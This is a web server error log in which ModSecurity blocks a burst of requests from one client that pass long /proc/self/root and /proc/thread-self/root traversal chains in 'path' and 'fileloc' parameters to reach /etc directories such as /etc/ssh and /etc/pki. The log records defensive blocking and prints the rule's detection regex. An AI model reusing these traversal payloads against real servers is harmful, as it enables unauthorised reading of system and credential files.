[Mon Mar 16 18:16:08.480096 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.241.46:39700] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzGKTCbgAP5jq5TehIPQAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:09.836656 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:54644] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzGaQpVkWug9HeOt9QcQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:11.087369 2026] [:error] [pid 29507:tid 140411582465792] [client 74.7.241.46:54646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzG0r9dMAiw-8KANNlkgAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:12.403516 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:54658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzHI6lpbStxTqkSkuF9gAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:13.606880 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:54674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzHbABkC4fWIHEf8EUxgAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:14.891314 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:54690] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzHrysWC90G-1nBrBhZQAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:17.065308 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.241.46:54702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzIc_BxrYCr4hPDw8HIAAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:18.343387 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.241.46:57770] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzIqTCbgAP5jq5TehIQwAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:25.380157 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:57784] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzKLysWC90G-1nBrBhbAAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:27.763407 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:57788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzK_9ocpUE4ed4uDwQhAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:29.034233 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.241.46:45342] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzLaQpVkWug9HeOt9QcwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:30.251835 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:45350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzLrysWC90G-1nBrBhbgAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:31.581696 2026] [:error] [pid 29802:tid 140411599251200] [client 74.7.241.46:45362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzL8_BxrYCr4hPDw8HJQAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:33.831758 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:45378] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzMdSswJuvopo3lOh9pAAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:35.137685 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:45382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzM9SswJuvopo3lOh9pQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:36.354558 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:45394] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzNNSswJuvopo3lOh9pgAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:37.823936 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:45408] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzNf9ocpUE4ed4uDwQiAAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:16:46.809837 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:54038] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzPv9ocpUE4ed4uDwQkwAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:17:27.211116 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.241.46:34906] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzZ6TCbgAP5jq5TehIdAAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:28.554866 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:36016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzaKQpVkWug9HeOt9QfwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:29.735246 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:36030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzaf9ocpUE4ed4uDwQmAAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:30.939682 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.241.46:36034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzalajLEzk2WiQ-10vZQAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
